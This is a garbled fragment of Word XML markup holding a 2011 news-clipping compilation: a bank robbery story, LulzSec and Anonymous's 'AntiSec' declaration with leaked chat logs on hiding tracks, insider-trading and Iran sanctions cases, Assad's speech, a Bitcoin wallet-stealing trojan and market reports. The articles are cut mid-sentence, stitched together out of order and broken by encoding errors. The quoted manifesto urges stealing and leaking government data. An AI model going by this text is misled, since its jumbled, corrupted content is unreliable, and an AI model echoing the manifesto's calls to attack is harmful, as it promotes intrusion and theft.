doesnБ─(tm)t join the ranks of the repeat offender. But today, he has no regrets about the robbery or where it landed him. Б─°If I had not exercised all the alternatives I would be sitting here saying, Б─≤Man I feel bad about it,Б─(tm)Б─² he said. But Verone said he thinks he made the right choice for his situation. Б─°I picked jail.Б─²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 you think of this man's story? Inspirational or outrageous? Share your opinion below!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and Article Source: The Gaston Gazette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-Stephen Chapman SEO Whistleblower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 New Bitcoin malware steals Bitcoin wallets: Infostealer.Coinbit Bitcoin: A guide to the future of currency AutoRun malware infections declining European Union plans tougher penalties to deter cybercrime, botnets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ZDNet 2011.06.20 23:39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.zdnet.com/blog/seo/man-politely-robs-bank-for-1-lands-free-healthcare-in-prison/3453</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Anonymous Declare "War" on U.S., International Gov'ts, Banks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 appears to be refocused on "socially minded" hacking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("Lulz Security") has made a name for itself with its many hacks [1][2][3] of Sony Corp. But its most daring hacks have been a distributed denial of service takedown of the U.S. Central Intelligence Agency, a hack of U.S. Senate servers, and an attack on an affiliate of the U.S. Federal Bureau of Investigation.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these audacious attacks, the U.S. government appears to be no closer to finding the merry cyber bandits. There have been no accurate reports of homes being raided; no arrests yet made.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Declaration of War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Looking to up the ante, LulzSec has announced its intention to team up with the hacker collective Anonymous to attack international government and financial institutions, who the group accuses are the hoarders of "corrupt booty". The U.S. government and banking system are among the most prominent targets. Labeling these parties "terrorists" (a term some are applying to the LulzSec members themselves), it writes [PasteBin]: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Salutations Lulz Lizards,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we're aware, the government and whitehat security terrorists across the world continue to dominate and control our Internet ocean. Sitting pretty on cargo bays full of corrupt booty, they think it's acceptable to condition and enslave all vessels in sight. Our Lulz Lizard battle fleet is now declaring immediate and unremitting war on the freedom-snatching moderators of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Welcome to Operation Anti-Security (#AntiSec) - we encourage any vessel, large or small, to open fire on any government or agency that crosses their path. We fully endorse the flaunting of the word "AntiSec" on any government website defacement or physical graffiti art. We encourage you to spread the word of AntiSec far and wide, for it will be remembered. To increase efforts, we are now teaming up with the Anonymous collective and all affiliated battleships.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you're sailing with us or against us, whether you hold past grudges or a burning desire to sink our lone ship, we invite you to join the rebellion. Together we can defend ourselves so that our privacy is not overrun by profiteering gluttons. Your hat can be white, gray or black, your skin and race are not important. If you're aware of the corruption, expose it now, in the name of Anti-Security.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priority is to steal and leak any classified government information, including email spools and documentation. Prime targets are banks and other high-ranking establishments. If they try to censor our progress, we will obliterate the censor with cannonfire anointed with lizard blood.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now or never. Come aboard, we're expecting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History begins today.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The campaign appears to be a departure of LulzSec's tradition of DDoS griefing and brings to mind Anonymous's hacks of Bank of America and HBGary. Particularly interesting is the notion of hacking government sites to ferret out corruption.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online community tends to have mixed feelings on such efforts. Many are mildly supportive, but a prevailing sentiment is "Who is watching the watchmen?"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Wikileaks has arguably demonstrated, it's easy for such efforts to devolve into financially-motivated publicity campaigns and for lives and reputations to be endangered by careless publication.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First Strike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first effort in the new campaign, LulzSec took down the website of Britain's Serious Organised Crime Agency (SOCA) agency, an agency which performs similar duties to the U.S. Drug Enforcement Administration and the U.S Bureau of Alcohol, Tobacco, Firearms and Explosives.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posted to Twitter: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Tango down - http://t.co/JhcjgO9 - in the name of #AntiSec The SOCA page now appears to have come back to life and is fully reachable.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update here as more attacks come.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Anonymous and LulzSec - Friends Till the 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we correctly reported that LulzSec's botnet was composed partially of 4Chan users of the '/b/' message board, some publications [1][2] became a bit overeager and erroneously jumped to the conclusion that Anonymous (who frequents 4Chan) were at war with LulzSec.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groups firmly dispelled such notions.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Anonymous's AnonOps Twitter account posted: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Attention #Media: about #Lulzsec and #Anonymous, we are not at war. We are bros of teh internetz. Also, /b/ != Anonymous.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>"YourAnonNews", another Twitter affiliated with the group, added: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NOT at war with @LulzSec #MediaFags And LulzSec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confirm, we aren't going after Anonymous. 4chan isn't Anonymous to begin with, and /b/ is certainly not the whole of 4chan. True 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 is the peon of all the 4chan boards and 4chan is the mass amplification of crowdsourcing used by AnonOps to gain support. #MediaFacts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Saying we're attacking Anonymous because we taunted /b/ is like saying we're going to war with America because we stomped on a cheeseburger. So that's settled - LulzSec and Anonymous are friends - even if some 4Chan users are upset at the fact that their computers were taken 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Anonymous Members' Handles Exposed?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site LulzSecExposed is generating a lot of attention for claiming to carry chat logs taken from inside LulzSec by "Web Ninjas" for the purpose of "Bringing Lulz to hack victims."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chat logs include the groups handles ("Sabu", "Neuron", "storm","Recursion_", "trollpoll","io", "Topiary", "JoePie91", and "tflow"), the name of at least one of the group member's virtual proxy network server ("HideMyAss"), and more.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amusing revelations is that some members appear to have quit as the government attacks started. Reads one log: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23:31:23 ‹Sabu› recursion and devurandom quit respectfully Jun 03 23:31:27 ‹Sabu› saying they are not up for the heat Jun 03 23:31:32 ‹Sabu› you realize we smacked the fbi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in the log they advise a new member how to cover his tracks, commenting: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 03 23:40:32 ‹Neuron› Yo anyone have any extra tips for staying safe?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:43:08 ‹Sabu› clean your box out, make sure any sensitive info you have encrypted on a usb stick Jun 03 23:43:12 ‹Sabu› stay behind your vpn Jun 03 23:43:16 ‹Sabu› from now on your vpn is your weapon Jun 03 23:43:23 ‹Sabu› without your weapon you are nothing Jun 03 23:43:30 ‹Sabu› without you it is notihng blah blah blah Jun 03 23:43:34 ‹Neuron› haha Jun 03 23:43:39 ‹Sabu› and dont do nothing we dont approve of :D Jun 03 23:44:04 ‹Neuron› Alright right now.. My "hackbox" has 512 aes encryption on the entire harddrive Jun 03 23:44:18 ‹Neuron› two passwords and truecrypt on info concerning anything hacking related Jun 03 23:44:24 ‹Neuron› and my vpn is HideMyAss Jun 03 23:44:43 ‹storm› sabu Jun 03 23:44:55 ‹storm› my netbook will be here win only a matter of days Jun 03 23:45:01 ‹storm› and ill be wiping my entire system Jun 03 23:45:05 ‹storm› desktop Jun 03 23:45:14 ‹storm› and just encrypting the entire drive Jun 03 23:45:16 ‹Neuron› im already wiping my enitre desktop Jun 03 23:45:16 ‹storm› after i scrub it Jun 03 23:45:58 ‹Sabu› yeah Jun 03 23:46:01 ‹Sabu› wipe it all Jun 03 23:46:04 ‹Sabu› im wiping all my shit now Yet another log indicates that "Topiary" and "JoePie91" are working as public relations team members for the group and helping to channel donations to it via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these logs prove real, this could prove very bad news for some members of LulzSec as they might give the government the clues they need to discover their real word identities and/or locations.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there's no real smoking guns in the logs - yet.</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2011.06.20 21:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/LulzSec+Anonymous+Declare+War+on+US+International+Govts+Banks/article21952.htm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Hedge Fund Expert-Networker Convicted in Insider Trade Case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11:39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Hedge Fund Expert-Networker Convicted in Insider Trading Case Facebook, Primary Global, WaMu, Credit Suisse in Court News Jiau Jury Starts Weighing Charges of Hedge Fund Insider-Trading Stanford Receiver Sues Libya for $55 Million, Lawyer Says Brooklyn Money Manager Gets 20 Years for Ponzi Scheme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Patricia Hurtado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sentencing date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Winifred Jiau, a former consultant with expert networking firm Primary Global Research LLC, was convicted in the third trial to result from a U.S. government crackdown on insider trading tied to hedge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43, who provided industry information to financial clients, was convicted of one count each of conspiracy and securities fraud in Manhattan federal court for passing inside tips about Nvidia Corp. and Marvell Technology Group Ltd. to hedge fund managers.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sentencing date was scheduled for Sept. 21. Jiau's lawyer, Joanna Hendon, said she would file an appeal after the sentencing.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of Freemont, California, was one of several dozen people charged in overlapping insider rings stemming from the probe of New York-based hedge fund Galleon Group LLC. The cases implicated hedge funds, banks, technology firms and consultants such as Jiau.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Galleon co-founder Raj Rajaratnam was convicted May 11 of directing the largest hedge fund insider trading ring and faces almost 20 years in prison at his July 29 sentencing. Ex-Galleon trader Zvi Goffer was convicted with two others June 13 on related charges and faces a similar sentence Sept. 21.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lawyer unsuccessfully argued before trial that her client's indictment was flawed, saying there was no evidence that any "insider" breached a fiduciary duty not to disclose material non-public information.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District Judge Jed Rakoff rejected the claim.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Pleas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Assistant Manhattan U.S. Attorney Avi Weitzman said Jiau passed inside information obtained from sources at Nvidia and Marvell to Noah Freeman, a Boston hedge-fund manager who pleaded guilty and is cooperating with the U.S., and Samir Barai, founder of Barai Capital Management LP in New York. Barai has also pleaded guilty.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informed Freeman that he needed to provide more money because she needed to pay her sources at Marvell and Nvidia," Weitzman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have charged that Freeman was involved in a separate conspiracy to commit securities and wire fraud with Donald Longueuil, a former SAC Capital Advisors LP fund manager who has also pleaded guilty.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said Freeman passed inside information he obtained from sources, including Jiau, to Longueuil, who in turn tipped Freeman off to material, non-public information. Jiau received as much as $10,000 a month for the tips, prosecutors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Barai's Plea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Barai's plea in May came just hours after Sonny Nguyen, 39, of San Jose, California, and a former senior financial analyst for Nvidia, pleaded guilty before Rakoff to conspiracy to commit securities and wire fraud in a related case.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Barai said he conspired with Freeman and Longueuil to violate federal securities laws. He said on "numerous occasions" from early 2006 to late 2010, "I paid for and utilized the services of an expert networking firm who employed persons working at technology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at his plea hearing that Freeman and Longueuil listened in on calls with expert networking sources who provided "material, nonpublic information including revenues, gross margins and earnings."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used this information in making trades," he said. "I also shared this information with Mr. Freeman and Mr. Longueuil so they could make trades at their hedge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Barai and Nguyen implicated Jiau in their schemes.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Barai said in May 2008 he participated in calls with Jiau, who provided tips about Marvell, a Santa Clara, California-based maker of chips for personal computers and mobile phones.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Phone Calls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Jiau's trial, Jason Pflaum, a former analyst at Barai Capital, testified he listened in on phone calls when his boss got nonpublic information on companies from Jiau.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Pflaum said he listened to calls with expert networkers, recorded them, wrote contemporaneous electronic instant messages and kept notes for Barai, who is hearing impaired. Pflaum has pleaded guilty and is cooperating with prosecutors.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Nguyen said he passed tips about Nvidia's quarterly earnings before they were publicly announced to Jiau. Nvidia, based in Santa Clara, California, is a maker of graphics chips.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Nguyen told Rakoff that he conspired with Jiau and another man he identified as Stanley Ng to pass and receive tips.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"Between 2007 and 2008 I agreed with others to engage in an insider trading scheme," Nguyen said. "I provided material nonpublic information to my co- conspirators."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Rakoff interrupted him to ask, "Who was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Winnie Jiau and Stanley Ng, about Nvidia Corp.'s quarterly financial results before such information was public," Nguyen replied. "In exchange I received stock tips."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Made Millions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Ex-SAC Portfolio Manager Freeman told jurors at Jiau's trial that he made millions of dollars on illegal inside information using expert networking firms, which he likened to online dating service Match.com LP.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Freeman, who pleaded guilty to securities fraud and is cooperating with the government, told jurors that Jiau passed him "perfect information" about Nvidia and Marvell for at least eight quarters, and that he made $5 million to $10 million on Nvidia and "broke even" on Marvell.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Firms such as Primary Global would provide a list of 20 consultants and the portfolio managers would choose to speak to a specialist for a fee, as much as $1,000 for a telephone call. Freeman said SAC Capital used Primary Global "almost exclusively, if not exclusively" as its expert networking firm.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Primary Global provided another service, called a "private" network of experts, that managers could use exclusively for a fee. The firm also provided a "season pass" that would allow fund managers to get unlimited access to an insider for a flat rate.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SAC we almost exclusively used Primary Global Research," Freeman testified.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U.S. v. Jiau, 11-cr-00161, U.S. District Court, Southern District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David E. Rovella, Mary Romano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Patricia Hurtado in New York federal court at pathurtado@bloomberg.net.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Airbus A320Neo Orders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Sophisticated Hack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Apple Raises the Stakes in Patent Battle With Samsung How Sweden Steered Clear of the Greece Fiasco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How Sweden Steered Clear of the Greece Fiasco The Big Business of Synthetic Highs Krispy Kreme Wants to Be Good for You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Sweden Steered Clear of the Greece Fiasco God's MBAs: Why Mormon Missions Produce Leaders Apple Raises the Stakes in Patent Battle With Samsung Bitcoins: Currency of the Geeks Ron Paul's Fort Knox Fever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Insider Trading Hedge Funds Exchange-Traded Fund Electronic Trading in Asia Day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19:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-20/hedge-fund-expert-networker-convicted-in-insider-trade-case.html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Iran Shipping Firm Faces Charges in Money-Moving Scheme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12:01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Banks CanБ─(tm)t Block TheFlyonthewall.com Reports, Court Rules Facebook, Primary Global, WaMu, Credit Suisse in Court News Jiau Jury Starts Weighing Charges of Hedge Fund Insider-Trading U.S. Dismisses Terror Indictment Against Osama Bin Laden NJ Transit Says Trains to and From NYC Delayed Up to 45 Minutes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Karen Freifeld and Phil Milford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Islamic Republic of Iran Shipping Lines was charged with about a dozen other firms in a scheme to move more than $60 million through at least seven U.S. banks in violation of government sanctions.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banks included JPMorgan Chase &amp; Co., Citigroup Inc., and Bank of America Corp., according to Adam Kaufmann, chief of investigations for Manhattan District Attorney Cyrus R. Vance Jr. The banks aren't accused of any wrongdoing.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2008, defendants "began using alias names and shell companies to gain access to the U.S. financial system" and "engaged in illicit commercial transactions through correspondent bank accounts domiciled in New York," according to a 317-count indictment filed in New York state court.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charges include falsifying business records in the first degree and conspiracy, according to the grand jury indictment.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call seeking comment from the Iranian office at the United Nations wasn't immediately returned. Scott Silvestri, a spokesman for Charlotte, North Carolina-based Bank of America, didn't return a call seeking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Jon Diat, a spokesman for New York-based Citigroup, and Jennifer Zuccarelli, a spokeswoman for New York-based JPMorgan,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‘Shining a Spotlight'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office is shining a spotlight on the fraudulent activities of IRISL, which has been sanctioned by the U.S., the European Union and the U.N. for its role in the proliferation of weapons of mass destruction," Vance said in a statement. "IRISL and its sanctioned affiliates used a web of aliases or corporate alter egos across the globe to exploit the services of financial institutions located in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Treasury Department, which is holding a joint conference call with Vance's office at 11 a.m. on the matter, today said it will apply sanctions to 10 shipping companies affiliated with IRISL and three individuals in response to Iran's alleged evasion of sanctions and its ongoing creation of front companies to protect IRISL, according to a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private sector around the world increasingly turns its back on Iran's national shipping line, IRISL's efforts to evade international sanctions and increased scrutiny have grown more and more desperate," Adam Szubin, director of the U.S. Treasury's Office of Foreign Asset Control, said in the statement. "The persistent attempts by IRISL to deceive the world, including through the front companies identified today, attest to the weakness of IRISL as it tries to maintain a semblance of legitimacy while supporting Iran's proliferation of activities."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UAE, Singapore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Treasury's actions target the IRISL's activities in the United Arab Emirates, Singapore, China and the United Kingdom. The companies include Santex Lines, Sinose Maritime, Fairway Shipping, and Alireza Ghezel Ayagh. Treasury sanctioned the IRISL in September 2008 for its logistical services to Iran's Ministry of Defense and Armed Forces Logistics, the arm of Iran's military overseeing its ballistic missile program.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was immediately available to comment at Fairway Shipping in Rotterdam late today. Officials at Sinose Maritime in Singapore didn't answer the telephone after business hours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another investigation by Vance's office, Credit Suisse AG, Lloyds Banking Group Plc and eight other banks have come under scrutiny for processing payments which allowed Iran and other sanctioned nations to gain access to U.S.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Zurich-based Credit Suisse and London-based Lloyds settled with state and federal authorities in the U.S. Lloyds paid over $350 million in January 2009 to settle the U.S. investigation. It admitted to altering wire transfer information to hide the identity of its clients and allowing billions of dollars to pass through U.S. banks in violation of the sanctions, according to the settlement with the Manhattan District Attorney and the Justice Department.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Suisse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Suisse agreed to pay $536 million to U.S. authorities for making more than $1.6 billion in illegal transactions involving Iran, Sudan, Burma, Cuba and Libya from the mid-1990s through 2006, according to court documents.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People of the State of New York v. Islamic Republic of Iran Shipping Lines, et al., 11-02924, Supreme Court of the State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Michael Bathon in Wilmington, Delaware, and Cheyenne Hopkins in Washington. Editors: David E. Rovella, Mary Romano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Karen Freifeld in New York State Supreme Court in Manhattan at kfreifeld@bloomberg.net and; Phil Milford in Wilmington, Delaware, at pmilford@bloomberg.net.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Airbus A320Neo Orders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Sophisticated Hack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Apple Raises the Stakes in Patent Battle With Samsung How Sweden Steered Clear of the Greece Fiasco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How Sweden Steered Clear of the Greece Fiasco The Big Business of Synthetic Highs Krispy Kreme Wants to Be Good for You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Sweden Steered Clear of the Greece Fiasco God's MBAs: Why Mormon Missions Produce Leaders Apple Raises the Stakes in Patent Battle With Samsung Bitcoins: Currency of the Geeks Ron Paul's Fort Knox Fever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Shipping Industry Women in Business Social Media in the Workplace Investing in Technology Micro Finance in India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19:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-20/iran-shipping-firm-faces-charges-in-money-moving-scheme.html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Assad Calls for Talks, Says Syria Unrest Sparked From Abroad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12:08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NATO Acknowledges It Did Conduct Airstrike on Sorman in Libya NATO Acknowledges Possible Civilian Casualties in Tripoli Strike Yemeni Clerics Seek SalehБ─(tm)s Removal, Elections in 60 Days QaddafiБ─(tm)s Forces Fire Rockets at Libyan Port City of Misrata Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli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Glen Carey and Inal Ersan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U.K. comment in fifth paragraph, protests in sixth, Israeli comment in seventh, eighth.)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Syrian President Bashar al-Assad called for a national dialogue that may lead to constitutional amendments as he blamed the ongoing unrest in the country on a foreign conspiracy.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dialogue has become the title of the current phase," Assad said today in a speech carried live on state television from Damascus, the capital. "The conspiracy was designed abroad and perpetrated within our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Assad's 11-year rule began in mid-March as part of a wave of unrest across the Middle East and North Africa this year that has unseated the leaders of Egypt and Tunisia. Yemeni President Ali Abdullah Saleh is in Saudi Arabia for medical treatment for injuries sustained during an attack that followed months of anti-government rallies.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speech won't take people off the streets," Theodore Karasik, an analyst at the Institute for Near East and Gulf Military Analysis in Dubai, said in response to e-mailed questions. "Nothing new is being offered except for more rhetoric promising change that never materializes."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Foreign Secretary William Hague wrote on his Twitter Inc. feed that Assad's speech was "disappointing and unconvincing" and that there was "little new on how reforms will be implemented and when, or how he will end violence."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Speech Prompts Protests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Demonstrations erupted across Syria as protesters expressed disappointment with Assad's speech, saying it didn't meet their demands for political change, Al Jazeera television reported. Rallies were held in the suburbs of Damascus and in the cities of Homs, Hama, Latakia, Albu Kamal and Daraa, as well as in towns near Daraa, where the protests began, the network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Israeli Defense Minister Ehud Barak said Assad may be forced out within six months, the Associated Press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 "ended up using too much brutal force, too many graves have been dug and he lost practically his legitimacy in the eyes of the Syrian people," Barak told the AP today. "He probably will stay around for another quarter or two but that will not change his fate."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Assad's speech was his third since the Syrian unrest started. In April, he said the lack of a connection between the government and its people had created popular anger. A month earlier, he said there will be a new parliament and local administrations after elections scheduled for August.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‘Absolute Conviction'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"complete and absolute conviction in the process of reform because it represents the interest of the homeland," Assad said today. "The problem is which reform we want and what are the details."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demands of Syrians he has met with "are with merit," citing examples of calls for justice, jobs, security and greater democracy. "We have started to resolve these issues,"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protests are the biggest challenge to the Assad family since 1982. That year, Assad's father and predecessor, President Hafez al-Assad, used the army to crush an uprising led by the Muslim Brotherhood movement and focused on the city of Hama. Thousands of people were killed. The Assads are from the Alawite minority in the Sunni Muslim-majority country of more than 21 million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Syrians need "to answer ourselves first if we want to amend some articles in the constitution or to change the constitution," Assad said. He also said a national dialogue may delay the August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dialogue is very important," Assad said. "We have to give it a chance because the whole future of Syria, if we want it to succeed, must be built on this dialogue."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Assad created a committee that is to prepare the ground for the national dialogue, the state-run television reported June 1. He also issued a decree in April approving a new government. It is led by former Agriculture Minister Adel Safar.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total of 1,289 civilians and 332 members of the security forces have been killed since Assad's regime cracked down on dissent, the Syrian Observatory for Human Rights said June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protests have been marked by "vandalism, murder and the destruction of private property," and the demonstrators are being paid, Assad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Syrians have been crossing the border into Turkey since June 8 to escape the violence. The number of Syrians fleeing to Turkey amid the unrest increased to 10,639, Turkey's state-run Anatolia news agency reported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Home'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refugees in Turkey should return home, Assad said. "We hope that the army can return to its barracks as soon as possible,"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forces were deployed in the north around Ma'arrat an Nu'man on June 17 after the army swept through the northern town of Jisr al-Shughour earlier this month. The deployment was "to prevent terrorists" from cutting off the highway that links Damascus to Syria's second-largest city, Aleppo, state television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Foreign Minister Sergei Lavrov urged the Syrian opposition today to commit to negotiations with Assad and avoid "provocations" that may destabilize the country, according to comments televised on Russian state channel Rossiya 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is being affected by the unrest and "confidence" must be restored, Assad aid. "The worst we could face is a weakened or collapsed Syrian economy,"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may expand as much as 2.5 percent this year, Finance Minister Mohammad Jleilati said June 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Obama administration is considering additional economic sanctions on Syria involving oil and gas, U.S. officials said on June 17. The U.S. is also examining whether there are grounds for seeking war-crimes charges stemming from the Syrian government's crackdown on civilians.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day earlier, United Nations Secretary-General Ban Ki-moon told reporters in Brasilia that Assad should "stop killing people" in protests in his country and called the attacks "totally unacceptable."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Lina Ibrahim in Damascus, Mariam Fam in Cairo, and Henry Meyer in Moscow. Editors: Jennifer M. Freedman, Heather Langan, Andrew J. Barden, Digby Lidstone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Glen Carey in Riyadh at gcarey8@bloomberg.net; Inal Ersan in Dubai at iersan@bloomberg.net.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Andrew J. Barden at barden@bloomberg.net; Shaji Mathew at shajimathew@bloomberg.net.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Airbus A320Neo Orders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Sophisticated Hack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Apple Raises the Stakes in Patent Battle With Samsung How Sweden Steered Clear of the Greece Fiasco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How Sweden Steered Clear of the Greece Fiasco The Big Business of Synthetic Highs Krispy Kreme Wants to Be Good for You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Sweden Steered Clear of the Greece Fiasco God's MBAs: Why Mormon Missions Produce Leaders Apple Raises the Stakes in Patent Battle With Samsung Bitcoins: Currency of the Geeks Ron Paul's Fort Knox Fever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Call Center Optimization Solar Energy Mobile Data Services IT for Oil and Gas Entrepreneurship in a Recession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19:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-20/assad-calls-for-talks-says-syria-unrest-sparked-from-abroad.html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Virtual money is not safe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 | Jun 20, 2011, 04.16pm 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authors move fast," Symantec's Stephen Doherty said in a blog post about digital pickpockets targeting Bitcoin, which was created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seen a recent Trojan in the wild targeting Bitcoin wallets" in computers running various versions of Windows, Doherty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one motive: to locate your Bitcoin wallet.dat file and email it to the attacker," Doherty said. "This is not surprising considering the potential values in a Bitcoin wallet." Bitcoins are digital currency that are accepted by a few online merchants. They can be traded at online currency exchanges such as Mtgox.com for real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Doherty said Bitcoin users should consider encrypting their wallet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Bitcoins, you have the option to encrypt your wallet and we recommend that you choose a strong password for this in the event that an attacker is attempting to brute-force your wallet open,"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a Bitcoin user going by the handle of "allinvain" claimed on a public Bitcoin forum that his computer had been hacked and 25,000 Bitcoins worth $500,000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drawn the attention of members of the US Senate recently following a report that they have been used to purchase prescription drugs, cocaine, LSD and heroin at an online network called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Joe Manchin, a Democrat from West Virginia, and Senator Charles Schumer, a Democrat from New York, wrote a letter to the US Attorney General and the Drug Enforcement Agency asking for the immediate shutdown of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purchasing Bitcoins through an exchange, a user can create an account on Silk Road and start purchasing illegal drugs from individuals around the world and have them delivered to their homes within days,"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like this story?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Times of India 2011.06.20 14:45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://timesofindia.indiatimes.com/headlines/tech/personal-tech/computing/Virtual-money-is-not-safe/articleshow/8925279.cms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Facebook Message From U.K. Juror Will Lead to Jail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6:56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Israeli Facebook Protest Targets High Cottage Cheese Prices London Tube Drivers End First Strike as Wimbledon Begins Oracle Seeks Б─≤BillionsБ─(tm) From Google in Java Patent Lawsuit UPS Says U.K. Bars Cargo Screening at Some Sites on Security MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court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Lumley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(Corrects spelling of name in second paragraph of story originally published June 14.)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14 (Bloomberg) - An English juror will be jailed after using Facebook Inc.'s social-networking service to contact a defendant in a drug case during trial and discussing the jury's deliberations.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Joanne Fraill, 40, must be imprisoned for contempt of court, Lord Chief Justice Igor Judge said today. He and two other judges will determine the length of her sentence June 16.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circumstances to avoid" jail time, he said at the London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first time someone has been punished for contempt of court because of contact over the Internet, said U.K. Solicitor General Edward Garnier, who prosecuted the case. Jamie Sewart, the female defendant Fraill contacted, was also found guilty of contempt.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judges said Sewart, 34, wouldn't be imprisoned because she has a young child and already served 14 months on remand for the crime on which she was acquitted.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Garnier said that on Aug. 3 Fraill contacted Sewart, a defendant in the case she was deliberating on, using Facebook's instant messaging. While Sewart already had been acquitted in the case, the jury at Manchester Crown Court in northern England was still deliberating charges against others.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lawyer for Fraill, told the judges his client confessed to contacting the defendant during the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conversation Sewart asked Fraill "what's happening with the other charge," Garnier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Fraill responded: "No-one budging," while telling Sewart not to mention the message saying she feared a mistrial.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Sewart said on the witness stand that she wasn't sure she was speaking with a juror when she received the messages and denied the contempt of court charge.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Christopher Scinta, Anthony Aarons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James Lumley in London at jlumley1@bloomberg.net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Anthony Aarons at aaarons@bloomberg.net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 S. Broadband Policy Facebook Advertising U.S.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Competitiveness Lead Generation U.S. Retail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14:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-20/facebook-message-from-u-k-juror-will-lead-to-jail.html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Stocks, Euro Drop on Greek Aid Delay; Oil Approaches Bear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5:54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Weakens on Delayed Agreement on Greek Loan, Growth Concern Asian Stocks Drop as Oil Slides; Japanese Utility Shares Rally Japanese Stocks Climb From Three-Month Low as Utilities Advance Asian Stocks Post Longest Series of Weekly Losses Since 2004 Stocks Rise, Euro Strengthens on Greece Optimism; Oil Sinks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Stephen Kirkland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Stocks fell, with European shares extending seven weeks of losses, while the euro weakened and default risk climbed after officials failed to agree on a Greek loan payout. Oil all but wiped out its gain for the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Stoxx Europe 600 Index dropped 0.9 percent at 10:30 a.m. in London, prolonging its longest losing streak since January 2008. Standard &amp; Poor's 500 Index futures retreated 0.6 percent. The euro depreciated 0.7 percent to $1.4210 and slid 0.9 percent versus the Swiss franc. Italy's 10-year bond yield climbed four basis points after Moody's Investors Service said last week it may cut the nation's debt rating. Crude oil fell 1.3 percent, sinking almost 20 percent from this year's high.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who met yesterday in Luxembourg put off a decision on whether Greece will get the full 12 billion euros ($17.1 billion) promised for July and pushed for the nation to press ahead with budget cuts. Prime Minister George Papandreou faces a confidence vote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continues to dominate the headlines," Jim Reid, head of fundamental strategy at Deutsche Bank AG in London, wrote in a report today. "It is fair to say that the market was hopeful that the next disbursement from its original 110 billion-euro loan would be approved over the weekend. It does seem that the Greece story will run and run."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shares were the worst performers of 19 industry groups in Europe's Stoxx 600, with Banca Popolare di Milano Scrl plunging 7 percent and Banca Monte dei Paschi di Siena SpA tumbling 5 percent. HSBC Holdings Plc dropped 1.4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fell 0.5 percent against the yen, dropping for the fourth day, the longest run of declines in six weeks. The Swiss franc strengthened against all of its 16 major peers. The Australian dollar fell versus its most- actively traded counterparts, losing 1.1 percent against the 